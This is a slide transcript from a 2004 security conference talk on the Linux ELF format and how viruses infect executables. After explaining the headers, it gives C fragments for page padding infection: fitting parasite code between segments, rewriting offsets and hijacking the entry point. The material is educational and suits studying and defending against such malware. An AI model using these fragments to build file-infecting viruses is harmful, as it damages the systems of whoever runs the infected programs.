1 / 68

RUXCON 2004 ELF: A fairytale for viruses

RUXCON 2004 ELF: A fairytale for viruses. Presented by Daniel Hodson. Preface. PLT Redirection Runtime Injection Phdr hijacking Conclusion Q&A. ELF Format ELF Header Section Header Program Header Page Padding Infection Function Padding Infection. ELF: A fairy tale for viruses.

siran
Télécharger la présentation

RUXCON 2004 ELF: A fairytale for viruses

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. RUXCON 2004 ELF: A fairytale for viruses Presented by Daniel Hodson

  2. Preface • PLT Redirection • Runtime Injection • Phdr hijacking • Conclusion • Q&A • ELF Format • ELF Header • Section Header • Program Header • Page Padding Infection • Function Padding Infection

  3. ELF: A fairy tale for viruses ELF

  4. ELF Reasons • What is the Executable and Linking Format? • Part of the ABI • Streamline software development • Three main ELF object files. (Relocatable/Executable/Shared) • Two views - Executable/Linking

  5. ELF Reasons Execution View Linking View Compile time Linking #include <stdio.h> int data; int value = 1; int main(void) { data = 2; write(value, data, value); return 0 }

  6. ELF Reasons • What area of ELF will we focus on? • Executable object files • The execution view • 32 bit Linux systems

  7. ELF: A fairy tale for viruses ELF Header Elf32_ehdr

  8. ELF HEADER • What is it? “An ELF header resides at the beginning and holds a ‘road map’ describing the file’s organization.” • Provides information such as offsets to program header and section header tables, sizes and number of entries, along with identification information.

  9. ELF32_Ehdr

  10. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header • e_ident[0-3] – This holds the elf magic numbers • 7f, E, L, F Program Header Section 1 Section 2 Section[n] Section Header table

  11. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_type – This identifies the type of object file. ET_EXEC(2) – Executable file ET_DYN(3) – Shared object file Program Header Section 1 Section 2 Section[n] Section Header table

  12. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_machine – Required architecture of the file. EM_386 (3) – Intel Architecture Program Header Section 1 Section 2 Section[n] Section Header table

  13. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_entry (0x08048278) – Virtual Address to which the system first transfers control “starting the process”. Program Header Section 1 Section 2 Section[n] Section Header table

  14. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_phoff – This holds the program header tables offset in bytes from the beginning of the file. Program Header Section 1 Section 2 Section[n] Section Header table

  15. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_shoff – This holds the section header tables offset in bytes from the beginning of the file. Program Header Section 1 Section 2 Section[n] Section Header table

  16. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4....(.| 00000030 22 00 1f 00 |"... | ELF Header e_phentsize – This holds the size in bytes of one entry in the program header table. Program Header Section 1 Section 2 Section[n] Section Header table

  17. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_phnum – This holds the number of entries in the program header table. Program Header Section 1 Section 2 Section[n] Section Header table

  18. ELF Header (Cont.) 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...| 00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.| 00000030 22 00 1f 00 |"... | ELF Header e_shentsize – This holds the size in bytes of one entry in the section header table. Program Header Section 1 Section 2 Section[n] Section Header table

  19. ELF: A fairy tale for viruses Section Header Table Elf32_Shdr

  20. Section Header What is it? • A section header table is used to locate and interpret all of the files sections. • A sections’ content is not known to the interpreter, so by using the identifying information given in the section header the interpreter can map the image correctly. • The table is an array [e_shnum] of Elf32_Shdr structures, holding informationabout section sizes, locations, virtual addresses and so on.

  21. Elf32_Shdr

  22. Section Header 00001d80 1b 00 00 00 01 00 00 00 02 00 00 00 | ............| 00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................| 00001da0 00 00 00 00 01 00 00 00 |........ | ELF Header sh_name – this specifies the name of the section. An index into the section headers string table. Program Header Section 1 Section 2 Section[n] Section Header table

  23. Section Header 00001d80 1b 00 00 00 01 00 00 00 02 00 00 00 | ............| 00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................| 00001da0 00 00 00 00 01 00 00 00 |........ | ELF Header sh_type – This categorizes the sections contents and semantics. SHT_SYMTAB(2) – Symbol Table. SHT_STRTAB(3) – String Table. SHT_DYNAMIC(6) – Used in dynamic linking. Program Header Section 1 Section 2 Section[n] Section Header table

  24. Section Header 00001d80 1b 00 00 00 01 00 00 00 02 00 00 00 | ............| 00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................| 00001da0 00 00 00 00 01 00 00 00 |........ | ELF Header sh_flags – describes the sections attributes. SHF_WRITE (1) – Writeable in process execution. SHF_ALLOC (2) – Occupies memory in process execution. SHF_EXECINSTR (3) – Executable instructions. Program Header Section 1 Section 2 Section[n] Section Header table

  25. Section Header 00001d80 1b 00 00 00 01 00 00 00 02 00 00 00 | ............| 00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................| 00001da0 00 00 00 00 01 00 00 00 |........ | ELF Header sh_addr – If the section appears in the process image, this is the address where the first byte will reside. Program Header Section 1 Section 2 Section[n] Section Header table

  26. Section Header 00001d80 1b 00 00 00 01 00 00 00 02 00 00 00 | ............| 00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................| 00001da0 00 00 00 00 01 00 00 00 |........ | ELF Header sh_offset – offset in bytes from the beginning of the file to the first byte in the section. Program Header Section 1 Section 2 Section[n] Section Header table

  27. Section Header 00001d80 1b 00 00 00 01 00 00 00 02 00 00 00 | ............| 00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................| 00001da0 00 00 00 00 01 00 00 00 |........ | ELF Header sh_size – This gives the sections size in bytes. Program Header Section 1 Section 2 Section[n] Section Header table

  28. ELF: A fairy tale for viruses Program Header Table Elf32_Phdr

  29. Program Header What is it? • A program header table is used to describe segment information the system needs to prepare in program loading for execution It holds information such as virtual addresses, file size/memory sizes, segment attributes and so on. • Program headers are meaningful only for executable and shared object files, and in cases such as shared libraries may be ignored. • The program header is usually located directly after the ELF Header though this is not a specification.

  30. Elf32_Phdr

  31. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_type – The type of segment the header describes. PT_LOAD(1) – loadable segment, appears in process image. Program Header Section 1 Section 2 Section[n] Section Header table

  32. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_offset – offset in bytes from the beginning of the file at which the first byte of the segment resides. Program Header Section 1 Section 2 Section[n] Section Header table

  33. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_vaddr – virtual address at which the first byte of the segment resides in memory. Program Header Section 1 Section 2 Section[n] Section Header table

  34. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_filesz – number of bytes from the file appear in The memory image of the segment. Program Header Section 1 Section 2 Section[n] Section Header table

  35. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_memsz – number of bytes in the memory image of the segment. Program Header Section 1 Section 2 Section[n] Section Header table

  36. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_flags – permissions the segment will hold in memory. PF_X – Executable PF_W – Writeable PF_R - Readable Program Header Section 1 Section 2 Section[n] Section Header table

  37. Program Header 00000070 01 00 00 00 00 00 00 00 00 80 04 08 | ..........| 00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......| 00000090 00 10 00 00 |.... | ELF Header p_align (0x1000) – This gives the value to which the segments are aligned in memory and in the file. Program Header Section 1 Section 2 Section[n] Section Header table

  38. ELF: A fairy tale for viruses Infection Techniques Page Padding

  39. Page Padding Infection • What is page padding? • Page padding is the alignment of a segments page in memory to be congruent the page size. • The Program header specifies the alignment constraints in its p_align structure member. • p_vaddr/p_offset need to be congruent modulo the pagesz. • What is page padding infection? • The insertion of parasite code between two segments using the page padding as its host.

  40. Page Padding Infection Executable Image 0x2000 Text Segment 0x2C00 Padding the difference to the nearest page. 1024 bytes padding. Padding 0x3000 Data Segment 0x4000

  41. Page Padding Infection Infection Between Segments. 0x2000 Text Segment Text Segment Executable. Padding can host parasite. The binary is not yet stripped. Binary can support their code. 0x2C00 Parasite 0x3000 Data Segment 0x4000

  42. Page Padding Infection To ensure the padding is large enough to host the parasite, a check is usually done like the following: padding = prog_head->p_align - prog_head->p_vaddr + \ prog_head->p_filesz & (prog_head->p_align - 1); if(padding < sizeof(Parasite)){ fprintf(stderr, "Error: Padding cannot host parasite.\n"); cleanup(binary, rd_wr); return -1; }

  43. Page Padding Infection • The virus needs to increase the memory and file size of the text segment to ensure it will be loaded into the process image, and increase every following segments file offsets. // Search for text Segment and update rest. ---------- for(loop = 0; loop <= elf_head->e_phnum; loop++){ if(flag) prog_head->p_offset += 4096; else if(prog_head->p_type == PT_LOAD && \ !prog_head->p_offset){ flag = 1; entry_addr = (prog_head->p_vaddr + prog_head->p_filesz); offset = prog_head->p_poffset + prog_head->p_filesz; prog_head->p_filesz += sizeof(Parasite); prog_head->p_memsz += sizeof(Parasite); } prog_head++; }

  44. Page Padding Infection • The virus code associates itself with a section to be “strip safe” – the section used should be the last section in the infected segment. All following sections then have their file offsets changed. // Strip safe (associate with a section) and update the rest- for(loop = 0; loop <= elf_head->e_shnum; loop++){ if(sec_head->sh_offset >= offset) sec_head->sh_offset +=4096; else if(sec_head->sh_addr + sec_head->sh_size == entry_addr) sec_head->sh_size += sizeof(Parasite); sec_head++; }

  45. Page Padding Infection • Finally the virus changes the entry point of the binary, it then patches itself to jump to the original entry point, and increase the section header tables file offset. // Update information if(elf_head->e_shoff >= offset) elf_head->e_shoff += 4096; orig_entry = elf_head->e_entry; elf_head->e_entry = entry_addr; memcpy(Parasite[sizeof(Parasite) - 4], (char *)orig_entry, 4); [write...]

  46. Page Padding Infection

  47. ELF: A fairy tale for viruses Infection Techniques Static binary infection

  48. Static binary infection • Static infection has defeated the need for clustering viral code into one block of • memory (a page) and overcomes the heavy manipulation of sections and offsets • needed by page padding infection. • It is possible to not increase the file size with function padding infection.

  49. ELF: A fairy tale for viruses Infection Techniques PLT Redirection

  50. PLT Redirection • Taken from the ELF specifications – “The procedure linkage table redirects position independent function calls to absolute locations. The link editor cannot resolve execution transfers (such as function calls) from one executable or shared object to another. Consequently, the link editor arranges to have the program transfer control to entries in the procedure linkage table.”

More Related